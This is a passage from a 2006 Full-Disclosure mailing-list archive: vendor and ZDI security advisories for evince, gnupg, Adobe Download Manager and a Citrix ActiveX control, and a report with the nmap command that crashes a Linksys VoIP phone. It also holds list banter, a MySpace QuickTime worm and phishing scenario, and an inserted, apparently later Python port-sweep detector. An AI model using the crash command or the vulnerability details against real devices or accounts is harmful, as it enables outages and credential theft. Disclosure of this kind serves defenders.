It wasn't even that which I said. My point was always that there are better ways of doing things. You could drive 30 miles just to pull the plug yourself, leaving the current job unfinished or unable to get to that next problem in a suitable response time, or you could just tell the person on the phone to do that while you wait and see the result. In most cases, it has been the answer. It has never ALWAYS been the case. In the cases where it works, it is just a more efficient way for YOU to work. No "online" answer is going to fix a router that just lost its cool and is locked up unless you have installed a remote power down and power up (yeah, they exist but I haven't used one and can't remember the name).
The end result of working this way is a happy customer who is now able to work, a contact who feels superior because they worked with you to fix the problem and is more likely to help you out in future when you want something done that they are capable of doing, and you can get to your next appointment on time. Call me crazy but I reckon trying it first is always the best approach.

Greg.

From kees at ubuntu.com Thu Dec 7 00:30:18 2006
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 6 Dec 2006 16:30:18 -0800
Subject: [Full-disclosure] [USN-390-3] evince-gtk vulnerability
Message-ID: <20061207003018.GZ6550@outflux.net>

===========================================================
Ubuntu Security Notice USN-390-3           December 06, 2006
evince-gtk vulnerability
CVE-2006-5864
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  evince-gtk                    0.5.2-0ubuntu2.1

Ubuntu 6.10:
  evince-gtk                    0.5.2-0ubuntu4.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

USN-390-2 fixed vulnerabilities in evince. This update provides the corresponding update for evince-gtk.

Original advisory details:

  A buffer overflow was discovered in the PostScript processor included in evince. By tricking a user into opening a specially crafted PS file, an attacker could crash evince or execute arbitrary code with the user's privileges.
Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1.diff.gz Size/MD5: 22511 0cf118d6918268ba4f53c9b21c2e4abc http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1.dsc Size/MD5: 893 6bd5d56c1d26042f0882ad1c8f35d8c4 http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_amd64.deb Size/MD5: 311524 9afc1a61adb192c0c115bcc8231008c1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_i386.deb Size/MD5: 282212 15a8292c95bed93d2af5d4917172ca8c powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_powerpc.deb Size/MD5: 299064 510f7b8c93b8a8a65f71cae17176cd59 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu2.1_sparc.deb Size/MD5: 287254 f75088c1015e44cf7ed2633340d0d24f Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1.diff.gz Size/MD5: 22622 194a824da15c50fe472762f960f2b9fb http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1.dsc Size/MD5: 893 24d9a86b4a012fd133ee37b538e9156c http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2.orig.tar.gz Size/MD5: 1362513 5020afb1768d89c251ad8c2a233d9fcf amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_amd64.deb Size/MD5: 305732 af144ed0736a7ef77aba67ef9cbbeaae i386 architecture (x86 compatible Intel/AMD) 
    http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_i386.deb
      Size/MD5: 286362 21f58e429f79a605fa2bff0c36a7cbb6

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_powerpc.deb
      Size/MD5: 293918 c9e00c6154cddae33bd8c99afbace8fd

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/e/evince-gtk/evince-gtk_0.5.2-0ubuntu4.1_sparc.deb
      Size/MD5: 282784 596cfcc780feac5016866a46375cbc42

From zdi-disclosures at 3com.com Thu Dec 7 01:01:12 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Wed, 6 Dec 2006 17:01:12 -0800
Subject: [Full-disclosure] ZDI-06-044: Adobe Download Manager AOM Parsing Buffer Overflow Vulnerability

ZDI-06-044: Adobe Download Manager AOM Parsing Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-044.html
December 6, 2006

-- CVE ID:
CVE-2006-5856

-- Affected Vendor:
Adobe

-- Affected Products:
Adobe Download Manager 2.1 and earlier

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since April 3, 2006 by Digital Vaccine protection filter ID 4280. For further product information on the TippingPoint IPS:
    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Download Manager application. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists in the AOM file format parser.
A long [URL] element inside of a [DownloadRecord] element within an AOM file will result in a stack-based buffer overflow condition leading to execution of arbitrary code.

The Download Manager is installed during the installation of other Adobe products, such as Acrobat Reader. When installed, the download manager becomes the default application to handle .AOM files.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at:
    http://www.adobe.com/go/apsb06-19/

-- Disclosure Timeline:
2006.04.03 - Digital Vaccine released to TippingPoint customers
2006.04.07 - Vulnerability reported to vendor
2006.12.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
From announce-noreply at rpath.com Wed Dec 6 21:34:50 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Wed, 06 Dec 2006 16:34:50 -0500
Subject: [Full-disclosure] rPSA-2006-0227-1 gnupg
Message-ID: <4577377a.C5GCoI5KeAX9EO9W%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0227-1
Published: 2006-12-06
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect Deterministic Privilege Escalation
Updated Versions:
    gnupg=/conary.rpath.com at rpl:devel//1/1.4.6-0.1-

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6235
    https://issues.rpath.com/browse/RPL-835

Description:
    Previous versions of the gnupg package will execute attacker-provided code found in intentionally malformed OpenPGP packets. This allows an attacker to run arbitrary code as the user invoking gpg on the file that contains the malformed packets.

From mike.vasquez at gmail.com Wed Dec 6 18:00:37 2006
From: mike.vasquez at gmail.com (Mike Vasquez)
Date: Wed, 6 Dec 2006 11:00:37 -0700
Subject: [Full-disclosure] Nmap Online
References: <1b0d006c0612051905h39ce657bh214cf60a48be253d@mail.gmail.com>
Message-ID: <28f529ba0612061000v4a35b5dr185cd9f329488192@mail.gmail.com>

1) I'm sure none of you can imagine this, but sometimes running and startup configs aren't the same. YES it's TRUE! So, your approach could be disastrous and is really ill advised.

2) Nmap may not give reliable results from all sites. Surely you've encountered ACLs that caused erroneous nmap results from some locations. As the guy said: sometimes he travels. Having the capability to run it from a neutral location can get by that.

I'm sure there's more.....

On 12/5/06, Greg wrote:
>
> I don't wish to upset anyone but that answer has to be the craziest FIRST
> "port of call" approach I have seen used. I get plenty of those sorts of
> calls. I take about 30 seconds time on the phone for almost all of them. I
> say "Pull the power plug out of the router.
> Wait 10 seconds, plug it back in
> and wait another 10 seconds. OK, try now" and almost all of them report it
> works well.
>
> So why would I need and how could I use Nmap online to tell me the router
> went crazy and locked up?
>
> Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
> if I decided I needed to use it?
>
> Greg.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From TSRT at 3com.com Thu Dec 7 01:21:19 2006
From: TSRT at 3com.com (TSRT at 3com.com)
Date: Wed, 6 Dec 2006 17:21:19 -0800
Subject: [Full-disclosure] TSRT-06-15: Citrix Presentation Server Client ActiveX Heap Overflow Vulnerability

TSRT-06-15: Citrix Presentation Server Client ActiveX Heap Overflow Vulnerability
http://www.tippingpoint.com/security/advisories/TSRT-06-15.html
December 6, 2006

-- CVE ID:
CVE-2006-6334

-- Affected Vendor:
Citrix

-- Affected Products:
Citrix Presentation Server Client for Windows < v9.230

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since February 2006 by a pre-existing Digital Vaccine protection filter ID 4163. For further product information on the TippingPoint IPS:
    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Citrix Presentation Server Client for Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw resides in the SendChannelData function of the ActiveX control Wfica.ocx (CLSID 238F6F83-B8B4-11CF-8771-00A024541EE3).
The function is prototyped as follows:

    SendChannelData(ChannelName As String, Data As String, DataSize As Long, DataType As ICAVCDataType)

Specifying an undersized buffer length as the 'DataSize' parameter and supplying a large buffer as the 'Data' parameter results in an exploitable heap corruption.

-- Vendor Response:
Citrix has issued an update to correct this vulnerability. More details can be found at:
    http://support.citrix.com/article/CTX111827

-- Disclosure Timeline:
2006.02.01 - Pre-existing Digital Vaccine released to TippingPoint customers
2006.09.19 - Vulnerability reported to vendor
2006.12.06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Aaron Portnoy, TippingPoint Security Research Team.

From shawnmer at gmail.com Wed Dec 6 18:40:19 2006
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Wed, 6 Dec 2006 10:40:19 -0800
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan

Vulnerability Description
==================
The Linksys WIP 330 VoIP wireless phone will crash when a full port-range Nmap scan is run against its IP address.

Linksys WIP 330 Firmware Version
==========================
1.00.06A

Nmap scan command
================
nmap -P0 -p 1-65535

Impact
=====
The crash is only after Nmap has finished. The Nmap scan also seems to disrupt updating of the display as the clock is not updated. The crash appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 operating system.
Screenshot of the crash:
http://www.flickr.com/photos/metalmijn/295348294/

Credit
====
Credit for discovering this vulnerability goes to Armijn Hemel

From kees at ubuntu.com Thu Dec 7 02:37:50 2006
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 6 Dec 2006 18:37:50 -0800
Subject: [Full-disclosure] [USN-393-1] GnuPG vulnerability
Message-ID: <20061207023750.GA6550@outflux.net>

===========================================================
Ubuntu Security Notice USN-393-1             December 07, 2006
gnupg vulnerability
CVE-2006-6235
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  gnupg  1.4.1-1ubuntu1.6

Ubuntu 6.06 LTS:
  gnupg  1.4.2.2-1ubuntu2.4

Ubuntu 6.10:
  gnupg  1.4.3-2ubuntu3.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Tavis Ormandy discovered that gnupg was incorrectly using the stack. If a user were tricked into processing a specially crafted message, an attacker could execute arbitrary code with the user's privileges.
Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6.diff.gz
      Size/MD5: 23701 7a9033efbfb1f0028f53cef54f1a6522
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6.dsc
      Size/MD5: 684 4740552c8acbe2143bfff11dbfaee85b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1.orig.tar.gz
      Size/MD5: 4059170 1cc77c6943baaa711222e954bbd785e5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_amd64.deb
      Size/MD5: 1136698 64e954a21f51c939792b140f5a0fc5df
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_amd64.udeb
      Size/MD5: 152276 c703faddbf82858fa85560912ea3f7b0

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_i386.deb
      Size/MD5: 1044848 6dc25f6204f754f80b15f90bac175a25
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_i386.udeb
      Size/MD5: 130672 3a69e1804fb1234a70d9715d42b929e1

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_powerpc.deb
      Size/MD5: 1120042 16103aee54c188b9e74b81d776537bc4
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_powerpc.udeb
      Size/MD5: 140218 fcc41df5bf7d7336ac00ab8a1edaa665

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.1-1ubuntu1.6_sparc.deb
      Size/MD5: 1064838 8c78b6bca94a9bc62a9d7a9f5a8ae298
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.1-1ubuntu1.6_sparc.udeb
      Size/MD5: 139598 830785d65ea4bdb0d8ed8d123fcb2d6f

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4.diff.gz
      Size/MD5: 22621 3e45e6fe65cd1334a12d6bfbc9d26f2b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4.dsc
      Size/MD5: 690 1ce5bd388f35b6bdd48e12719308cea5
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2.orig.tar.gz
      Size/MD5: 4222685 50d8fd9c5715ff78b7db0e5f20d08550

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_amd64.deb
      Size/MD5: 1066564 f3c60d096d2ea85b02f8898660ab7997
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_amd64.udeb
      Size/MD5: 140308 5f18581d5ab54d33f2d69b079985c599

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_i386.deb
      Size/MD5: 981652 8497f389c4feb73d10ff8c82810b2659
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_i386.udeb
      Size/MD5: 120282 a0001759aec7eb6317d8bd0656078ff6

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_powerpc.deb
      Size/MD5: 1054114 565e5af4a14baed975050837af3d600b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_powerpc.udeb
      Size/MD5: 130160 d97f253e9f24a3f831b31d1fae25a67c

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.4_sparc.deb
      Size/MD5: 994418 15ec9d7565fd5a2ba18ca8cbd03357f8
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.4_sparc.udeb
      Size/MD5: 127412 028eaa2d4ca1c8d96eefaa663f853290

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2.diff.gz
      Size/MD5: 27943 c2dd800ba7a267e9ec69316c7d5c5326
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2.dsc
      Size/MD5: 697 c095b5eee6408adc65d88a26b124c026
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3.orig.tar.gz
      Size/MD5: 4320394 fcdf572a33dd037653707b128dd150a7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_amd64.udeb
      Size/MD5: 379922 56441176d8767b88d240284ea8c10b20
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_amd64.deb
      Size/MD5: 1112292 1ff2c321882324dc5d8b1b527a4131e2
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_amd64.udeb
      Size/MD5: 142630 a0d0bbb95df1652697e8c5dfce3abd6d

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_i386.udeb
      Size/MD5: 357610 2b83faf2418ae37d1f9b9d05948b98e2
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_i386.deb
      Size/MD5: 1055760 8034b6cd5cd73f7de7e7325b4e7d4603
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_i386.udeb
      Size/MD5: 129146 deb3e977a44c7ec6e9ebd279285d391c

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_powerpc.udeb
      Size/MD5: 372524 1385f1d9a1874d457ec7f41bb6f88028
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_powerpc.deb
      Size/MD5: 1107338 38c9a6fca86bf659781f8117ac80fa0b
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_powerpc.udeb
      Size/MD5: 136288 002befb66b791fdac4889095dbc67d1b

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.2_sparc.udeb
      Size/MD5: 366204 f350d40bceeebaf01a0f525aa33bb9ac
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.2_sparc.deb
      Size/MD5: 1042454 4b2f85afdea3cce9d837982badf7eb61
    http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.2_sparc.udeb
      Size/MD5: 132764 194f8cb7439efed249d84d39e4d27abc
From kokanin at gmail.com Thu Dec 7 02:31:13 2006
From: kokanin at gmail.com (Knud Erik Højgaard)
Date: Thu, 7 Dec 2006 03:31:13 +0100
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan

> The Linksys WIP 330 VoIP wireless phone will crash when a full
> port-range Nmap scan is run against its IP address.

oh crap so does this shitty sipoora box! i will turn it off now to avoid hakkings!

From kokanin at gmail.com Thu Dec 7 02:29:47 2006
From: kokanin at gmail.com (Knud Erik Højgaard)
Date: Thu, 7 Dec 2006 03:29:47 +0100
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan

> The Linksys WIP 330 VoIP wireless phone will crash when a full
> port-range Nmap scan is run against its IP address.

surprise! the zyxel something 2200 will die from malformed packets! WOW! CALL THE INTARWEB POLIECE! CALL ZYXEL POLICE, THEIR STUFFZ DON'T LIKE WEIRD PACKETZ!

From shawnmer at gmail.com Thu Dec 7 03:43:02 2006
From: shawnmer at gmail.com (Shawn Merdinger)
Date: Wed, 6 Dec 2006 19:43:02 -0800
Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan

No better/worse than this I suppose.
http://www.cisco.com/warp/public/707/cisco-response-20060113-ip-phones.shtml

Thanks,
--scm

On 12/6/06, Knud Erik Højga­ard wrote:
> > The Linksys WIP 330 VoIP wireless phone will crash when a full
> > port-range Nmap scan is run against its IP address.
>
> surprise! the zyxel something 2200 will die from malformed packets!
> WOW! CALL THE INTARWEB POLIECE! CALL ZYXEL POLICE, THEIR STUFFZ DON'T
> LIKE WEIRD PACKETZ!
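The thread above reports a phone that falls over once a full port-range scan has finished. From the defender's side the useful question is how to notice such a sweep in flow records early enough to act before a fragile device is hit. The block below is an added example, not code from the thread or from Linksys: a sliding-window detector run over constructed flow records. The addresses (192.0.2.50 as the scanner, 198.51.100.20 standing in for the phone) come from the documentation ranges, and `build_sample_flows`, `detect_port_sweeps`, the threshold and the window size are all my choices, not anything the posts specify.

```python
"""Detect full port-range sweeps against a host from flow records.

Added example (not from the Full-Disclosure thread). All records are
constructed: 192.0.2.50 plays the scanner, 198.51.100.20 the phone.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed flow records as (timestamp, src, dst, dport), sorted by time."""
    t0 = datetime(2006, 12, 6, 10, 40, 0)
    flows = [(t0, "198.51.100.30", "198.51.100.20", 5060)]      # ordinary SIP traffic
    for i, port in enumerate(range(1, 301)):                      # sweep of ports 1-300
        flows.append((t0 + timedelta(milliseconds=20 * i), "192.0.2.50", "198.51.100.20", port))
    flows.append((t0 + timedelta(seconds=30), "198.51.100.31", "198.51.100.20", 80))
    flows.append((t0 + timedelta(seconds=31), "198.51.100.31", "198.51.100.20", 443))
    return sorted(flows)


def detect_port_sweeps(flows, threshold=50, window=timedelta(seconds=10), fragile_hosts=()):
    """Alert when one source touches >= threshold distinct ports on one host within window.

    flows must be sorted by timestamp. fragile_hosts names devices known to
    crash under a sweep (like the phone in the thread); sweeps against them are
    raised at high severity so they can be acted on before the device goes down.
    """
    recent = defaultdict(deque)   # (src, dst) -> deque of (ts, dport) still inside the window
    alerts = {}                   # (src, dst) -> alert dict, updated as the sweep grows
    for ts, src, dst, dport in flows:
        key = (src, dst)
        dq = recent[key]
        dq.append((ts, dport))
        while ts - dq[0][0] > window:         # expire records that fell out of the window
            dq.popleft()
        distinct = len({p for _, p in dq})
        if distinct < threshold:
            continue
        alert = alerts.get(key)
        if alert is None:
            alerts[key] = alert = {
                "src": src, "dst": dst, "first": dq[0][0], "last": ts,
                "distinct_ports": distinct,
                "severity": "high" if dst in fragile_hosts else "medium",
            }
        alert["last"] = ts
        alert["distinct_ports"] = max(alert["distinct_ports"], distinct)
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_port_sweeps(build_sample_flows(), fragile_hosts={"198.51.100.20"}):
        print(alert)
```

The detector keys on (source, destination) pairs and counts distinct destination ports, so a single host's normal chatter to SIP and HTTP never gets near the threshold while the sweep trips it after the fiftieth port, a few seconds before a full 1-65535 scan would complete. The `fragile_hosts` set is where an inventory of devices like the one in the thread belongs.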
From degeneracypressure at gmail.com Thu Dec 7 05:20:06 2006
From: degeneracypressure at gmail.com (Eliah Kagan)
Date: Thu, 7 Dec 2006 00:20:06 -0500
Subject: [Full-disclosure] Hail list!
In-Reply-To: <001a01c71907$a4d0c7c0$ee725740$@com>
References: <001a01c71907$a4d0c7c0$ee725740$@com>
Message-ID: <3da3d8310612062120g1dada3cbjf1bc0f9160dca8c4@mail.gmail.com>

On 12/6/06, aNub15 wrote:
> 2. Looking for a low footprint windows firewall that's only supposed to do
> one thing. If someone hits port 110, block the I.P for a week? (should take
> care of most portscanners (skiddies)). And no I'm not worried about blocking
> real users on the box.

Has it occurred to you that someone could send spoofed SYN packets with port 110 as the destination, and any IP as the source? Maybe you should worry about blocking real users after all. If there is an IP range where you know you have no legitimate users, you should instead block that IP range. Any IP range where you might have legitimate users is a range that someone could deny access to easily. Except actually it would be you denying access to them--a person attacking you in that way would likely not even be legally responsible (but I am not a lawyer).

Also, why would that prevent access by most people scanning your ports? Suppose someone is scanning your entire subnet, for instance, but only on port 22. Or someone could scan lots of ports on your box, and notice that plenty were open until 110 was probed. This person could then think one of three things:

(1) Hmm, I guess that's all the ports open on that box.

(2) Hmm, lots of ports open, and then I scan port 110, and the rest are all closed/filtered. (This is especially likely if it is the person's *second* scan.) There must be something nice and juicy on that box. I will scan the rest of the ports from another IP and then penetrate any service I can and find out why such a strange measure of pseudo-security is in place.
(3) Hmm, I was reading Full Disclosure recently and somebody was asking about how to blacklist IPs for a week that send traffic to port 110. I bet this is the box of the guy who wanted to know how to do it. Let's find out why he wanted to do that...

> www.supernoia.com

Script kiddies and anybody else who likes portscanning thank you for the heads up. If you are going to implement this almost certainly bad idea--and it is for that server--you may wish to at least make it a different port.

-Eliah

From pdp.gnucitizen at googlemail.com Thu Dec 7 03:29:38 2006
From: pdp.gnucitizen at googlemail.com (pdp (architect))
Date: Thu, 7 Dec 2006 11:29:38 +0800
Subject: [Full-disclosure] New MySpace worm could be on its way
Message-ID: <6905b1570612061929u39e44839kb338281ada273409@mail.gmail.com>

http://www.gnucitizen.org/blog/myspace-quicktime-worm-follow-up

MySpace was hit by a worm in a semi-automatic manner. This time the worm propagated via a QuickTime flaw found a couple of months ago. This shouldn't be a surprise to anyone. It is quite serious that this attack vector was picked up by Apple so late. In this post I am not going to explain how this particular MySpace hack works but rather to send a reminder to the security community that another QuickTime XSS vector was found right after the first one. This vector can be used in a similar way although, IMHO, the impact is greater. I guess Apple should fix both issues NOW: we don't want MySpace worms spreading around again, although this is very utopic to say.

Here is a brief reminder of what the XSS issue was all about. The problem is caused by a quite useful feature called QuickTime Media Link (.qtl). The whole point of these QuickTime Media Link files is to provide means of playing media files in a more accessible way. In this respect the developer can create a .qtl file which holds information about the media content that needs to be played plus recommended dimensions, accessibility features, control features etc...
.qtl files can contain malicious JavaScript code that can take over some important network device when executed, for example. That's not the end of the story though. Because of its flexibility QuickTime doesn't mind if Media Link (.qtl) files end with .mp3, .mp4, .m4a or even .mov extension... This is a quite big problem especially in default configurations of iTunes. The iTunes installation wizard installs the QuickTime player and QuickTime browser plugins and associates various media files with its components. If you open an mp3 file from the desktop it will be played in iTunes player by default, however if you open it from some website it will be played in the QuickTime player browser plugin. In this respect, users who are previewing mp3 and other media files from the Internet are vulnerable.

GNUCITIZEN >> Backdooring MP3 Files

To sum up, and put into context, attackers can use QuickTime Media Links to imitate popular media files and as such trick the user into opening malicious content that could lead to their (MySpace) account or their browser being compromised. Let's look at the following hypothetical situation:

"Evil Hacker decides to overtake MySpace in order to DoS google.com. He finds that MySpace allows users to supply links in their posts and comments. He spends some time to research the 1000 most popular MySpace members where he will post links to media files titled orgy.mov or myconfession.mp3 or even prankster.avi. Once an unaware user clicks on the link, a phishing page is presented asking the current user to enter their MySpace details to see the private content. If the user is tricked, their credentials will be on their way to the collection point specifically designed for that operation, where another automatic process overtakes their user account, installing the same malicious file or simply hijacking other media files by wrapping them up in QuickTime Media Links the same way it is described in the article mentioned above.
The process repeats when another user falls into the trap. When enough accounts are compromised Evil Hacker will launch his/her DDoS against Google's AdSense server farm."

Before seeing more worms of this kind I suggest that we gather our intellectual power to find a fix or at least a workaround. I welcome you to join me at GNUCITIZEN's MySpace Worms Topic for further discussion. I can assure you that neither GNUCITIZEN nor I have anything to do with MySpace or any other related organization. The purpose of this symposium is to learn more about these types of worms and help other online applications and communities protect themselves. This is much better than just sitting in our comfy chairs and laughing at people's mistakes.

Many thanks.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

From jaervosz at gentoo.org Thu Dec 7 11:04:09 2006
From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen)
Date: Thu, 7 Dec 2006 12:04:09 +0100
Subject: [Full-disclosure] [ GLSA 200612-01 ] wv library: Multiple integer overflows
Message-ID: <200612071204.14142.jaervosz@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
